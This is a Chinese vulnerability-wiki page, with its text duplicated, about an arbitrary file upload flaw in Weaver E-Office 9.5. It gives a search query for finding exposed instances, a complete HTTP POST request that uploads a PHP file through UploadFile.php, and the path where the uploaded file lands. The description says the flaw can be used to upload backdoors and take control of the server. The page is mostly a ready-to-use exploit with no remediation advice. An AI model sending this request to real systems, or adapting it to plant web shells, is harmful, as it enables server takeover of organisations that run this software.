fofamini-wiki

登录白背景

源码

泛微E-Office UploadFile任意文件上传漏洞

一、漏洞简介

泛微E-Office是一款标准化的协同 OA 办公软件，泛微协同办公产品系列成员之一,实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。泛微E-Office UploadFile任意文件上传漏洞，利用文件上传漏洞上传后门文件获取服务器控制权限。

二、影响版本

泛微 E-Office 9.5

三、资产测绘

hunterapp.name="泛微 e-office OA"
特征

四、漏洞复现

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
Content-Length: 192

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

<?php phpinfo();?>
--e64bdf16c554bbc109cecef6451c26a4--

/images/logo/logo-eoffice.php

原文: https://www.yuque.com/xiaokp7/ocvun2/edznbo1da02i77ct

# 泛微E-Office UploadFile任意文件上传漏洞

# 一、漏洞简介
泛微E-Office是一款标准化的协同 OA 办公软件，泛微协同办公产品系列成员之一,实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。泛微E-Office UploadFile任意文件上传漏洞，利用文件上传漏洞上传后门文件获取服务器控制权限。

# 二、影响版本
+ 泛微 E-Office 9.5

# 三、资产测绘
+ hunter`app.name="泛微 e-office OA"`
+ 特征

![1699626155208-edbd078f-2fee-4a15-ae03-662e19b14f2e.png](./img/PFp3dPRgBNu2vYw0/1699626155208-edbd078f-2fee-4a15-ae03-662e19b14f2e-418373.png)

# 四、漏洞复现
```java
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
Content-Length: 192

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

<?php phpinfo();?>
--e64bdf16c554bbc109cecef6451c26a4--

```

![1717693930568-e1363d4c-3dd0-4855-a8b4-e9b6bfde1014.png](./img/PFp3dPRgBNu2vYw0/1717693930568-e1363d4c-3dd0-4855-a8b4-e9b6bfde1014-260899.png)

```java
/images/logo/logo-eoffice.php
```

![1717693969203-b8cd9d70-e5f3-411b-939e-b94e8effa7dd.png](./img/PFp3dPRgBNu2vYw0/1717693969203-b8cd9d70-e5f3-411b-939e-b94e8effa7dd-651828.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/edznbo1da02i77ct>

fofamini-wiki

泛微E-Office UploadFile任意文件上传漏洞

一、漏洞简介

<font style="color:rgb(0, 0, 0);">二、影响版本</font>

<font style="color:rgb(0, 0, 0);">三、资产测绘</font>

<font style="color:rgb(0, 0, 0);">四、漏洞复现</font>